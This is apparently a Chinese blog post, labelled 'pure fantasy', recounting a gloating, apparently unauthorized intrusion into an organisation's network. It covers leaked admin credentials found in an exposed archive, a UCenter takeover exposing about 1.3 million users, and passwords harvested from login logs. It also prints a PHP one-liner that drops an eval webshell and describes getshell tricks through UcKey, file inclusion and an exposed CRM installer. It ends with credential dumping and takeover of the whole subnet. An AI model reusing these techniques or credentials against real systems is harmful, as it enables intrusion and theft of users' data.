纯幻想过程

一次渗透过程

0x01 收集目标信息

目标站点222.xxx.xxx.106 222.xxx.xxx.108

经过旁站和C段 whois Email反查一系列搜集 基本定了目标的IP范围

222.xxx.xxx.100-110

(猜测这个范围在同一内网 结果就是猜对了>.<) 请输入图片描述

大概探测了一下 有个bbs(106) (Discuz X2)

     有一个动易2006(104)

     有一个动易2008(108)[108 100个站 大部分是子目录而已]

     其他网段大部分是自己写的ThinkPhp框架。。

0x02 广撒网

现在把目标放在了动易 但是经过一番XXOO 社工库查管理邮箱 依旧无法

然后把目标放在了Discuz

用DzScan.py扫了一遍 没啥敏感信息 但是还是记录一下

bbs.xxoo.com/uc/ (Ucenter)

bbs.xxoo.com/bbs/ (bbs)

确认了论坛管理有2个人

一个人是admin 一个人是qwert

看第二个管理觉得密码应该不强。。 结果跑了我10W字典。。Orz。。被坑了

请输入图片描述

用Google大法 成功猜到了某版主的号 哇卡卡

请输入图片描述

(得到高权限的号是想利用)

http://www.wooyun.org/bugs/wooyun-2014-074970 好吧 Discuz先放过

目标转向108 对108目录一遍乱扫之后

存在show.xxoo.com/ewebeditor.rar

里面就个TXT 记录了

sUsername= "admin"

sPassword = "medxxx888"

sUsername = "xxoo.com"

sPassowrd = "758xxx280"

Const uid = admin

const pwd = admin111

http://show.xxoo.com/admin758/login.asp

果断Mark下来 用admin758做成路径 扫了108一堆后台

但是由于都有管理验证码

苦苦猜解不出来(后来成功猜解 但是后台真心安全而且每一个后台都有防注入系统 注入警报。小菜太菜苦苦拿不到Shell…)

眼看一天快要过去 看看书睡觉~


0x02 运气爆表

第二天心血来潮用密码去试了Ucenter 结果。。

请输入图片描述

130W用户> 。<.. 这TM。。 要死。 要死。。(我啥都没做 只是Update了一下!)

后面应该是很简单的剧情

(比如 UcKey 改config_ucentr.php 拿Shell)

(又比如 Ucenter后台包含 GetShell)

但是。。 我被这个管理员深深的坑了。。

因为我都是喜欢用

<?php file_put_contents(‘c.php’,’<?php eval($_POST[c]);?>‘);?>

这一个图片马 但是这个管理员的安全意识简直把我震惊了。。

(拿下了之后我才发现。。 整个目录只有backup data config这3个目录是Apache有权限写的

而且这3个目录的php都是不解析的!! )

当我用UcKey GetShell Push上去之后。。

Shell连接不上。。

这是我一开始天真的查看时候返回的 请输入图片描述

这是我被菜刀提醒了之后查看源代码的时候发现的。。

请输入图片描述

而我用的Ucenter本地包含

http://www.91ri.org/9246.html

因为自己图片马的原因被坑了。。

这个漏洞演示有点坑

因为应用接口名称是有长度限制的 所以一般都是要在应用物理路径来跳到到../../bbs/data/fourmdata/2015/02/

之后在应用接口名称填写你的图片马

(因为这个目录权限原因坑了我的图片马 导致我认为这个包含是个坑。。。之后了解了 在本地测试成功,因为在台式机上 不想截图了)

0x03 xxoo成功

自己本地在搭了DisCuzX2来测试各种GetShell的姿势 结果。。 一不小心发现了Ucenter的数据列表 中的日志列表有记录各种事件但是最重要的便是。。 他记录了错误的密码。。这样看到了有不少人爆破过。。 还能看到什么。。? 比如说(管理员输错了密码!!)

通过日志发现 管理员qwert经常输入

xxoo2011Editor
xxoo2011Edirot
Daydayupxxoo2012
xxoo2000Editor

xxoo为域名 看来他经常吧Editor写成Edirot啊

而管理员admin他有时候会输入 UcenterAdministrator

lf_xxoo758
lf_xxoo0516
lf+xxoo758
xxoo8888

然后日志接下来就变成了

admin           Success!

我们想到了什么。。

他。。登错号了。。。!

过度试试 在前台bbs成功admin if_xxoo758登入成功!

但是DisCuzx2 后台GetShell资料太少 靠Wooyun的几个方法也没有成功

后来在本地DiscuzX2测试 发现了可以通过包含config_ucenter.php达到执行一句话的效果。。

其实用脑子想一想都知道config_ucenter.php会被包含啊。。!!

智商真捉鸡 找了一个比较好回显的文件 /api/uc.php

登录了发现服务器权限很死 但是我们数据库已经有了 哇嘎嘎

内核

Linux h14 2.6.32-431.17.1.el6.x86_64 。。

而且服务器犹如虚拟主机

Apache对www都没有读写的权限

于是就打算告辞为止 反正bbs数据权限已有

对Linux折腾一晚上 然后睡觉~


0x04 小插曲

因为那么大的一个网络 很想进去看看

果断换到了104

这里一个小插曲 104的动易 发现了一堆Easyxxoo.asp的用户

我Google了一下 发现有不少动易系统都有这些用户 怀疑是有人放了后门源码包>.<

幸好最新的动易2006不仅不允许这些用户注册 还不允许这些用户登录~

(我可是又去日了一个有Easyxxoo.asp用户的站 然后脱了库 登录了 发现不允许登录。。。艹)

之前用Nmap对100-110进行扫描 大部分都是只有 80 2758(FTP)打开着

而这个104打开了(13389 远程端口)(60007 这是重点)

在这个端口有一个Crm系统 访问install.php就可以重装了(其实还有其他办法。。)

请输入图片描述

然后下一步 不要导入数据! 他会先生成一个config.ini.php让你确认 这个时候直接去链接config.ini.php 密码a就OK拉~

那么严密的服务器 就只有这台Shell是System 唉

直接抓了passwd 然后XXOO上去

服务器上有flashxp

默认记录了一堆FTP 然后106 108 沦陷了

有一个文本记录了 Root Sa FTP密码。。

然后 网段沦陷了

不得不说 内网安全也做的很好

没有弱口令 也不能嗅探

但是 安全 关键还是人^ ^


自己收集的密码,敏感

也有2KB了。。

有了这些 就是 他家是我家的节奏了>.<

前前后后很多浪费时间的地方。。

没有记录 也是后来才补写的。。

不得不说这个网站真的很安全 有很多陷阱

他自己写的Cms也是吊得一比

不得不说 第三方cms 弱口令 这种东西

到哪里都是会有的 到哪里都是突破口~

水平不行 随便记记 嘎嘎

comments powered by Disqus